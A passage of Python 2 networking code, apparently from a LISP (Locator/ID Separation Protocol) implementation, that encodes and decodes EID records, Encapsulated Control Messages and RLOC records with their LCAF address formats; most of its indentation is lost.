self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
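
#
# Illustrative sketch (not called anywhere): record-TTLs are carried in
# minutes unless the high-order bit is set, in which case the low 31 bits
# are seconds. This mirrors lisp_eid_record.store_ttl() above.
#
def example_record_ttl_to_seconds(record_ttl):
    if (record_ttl & 0x80000000): return(record_ttl & 0x7fffffff)
    return(record_ttl * 60)
#enddef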
#
# Encapsulated Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm():
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
            self.udp_dport))
    #enddef
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
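
#
# Illustrative sketch (not called anywhere): the inner UDP header of an ECM
# is four network-order shorts, as packed at the end of lisp_ecm.encode()
# above.
#
def example_pack_udp_header(sport, dport, udp_length, checksum):
    return(struct.pack("HHHH", socket.htons(sport), socket.htons(dport),
        socket.htons(udp_length), socket.htons(checksum)))
#enddef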
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_rloc_record():
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and lisp_geo_list.has_key(name)):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and lisp_elp_list.has_key(name)):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and lisp_rle_list.has_key(name)):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and lisp_json_list.has_key(name)):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = ""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = ""
if (self.elp):
elp_recs = ""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = ""
if (self.rle):
rle_recs = ""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += rle_node.rloc_name + "\0"
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = ""
if (self.json):
lcaf_len = socket.htons(len(self.json.json_string) + 2)
json_len = socket.htons(len(self.json.json_string))
jpkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_JSON_TYPE,
0, lcaf_len, json_len)
jpkt += self.json.json_string
jpkt += struct.pack("H", 0)
#endif
spkt = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = ""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += self.rloc_name + "\0"
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
packet = packet[0:-2] + self.encode_lcaf()
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, nonce):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len])
packet = packet[json_len::]
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
# Get lisp_keys() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
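
#
# Illustrative sketch (not called anywhere): the low 3 bits of the
# RLOC-record flags field are local (L), probe (p), and reach (R), per the
# diagram above. This mirrors lisp_rloc_record.encode().
#
def example_rloc_record_flags(local_bit, probe_bit, reach_bit):
    flags = 0
    if (local_bit): flags |= 0x0004
    if (probe_bit): flags |= 0x0002
    if (reach_bit): flags |= 0x0001
    return(socket.htons(flags))
#enddef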
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
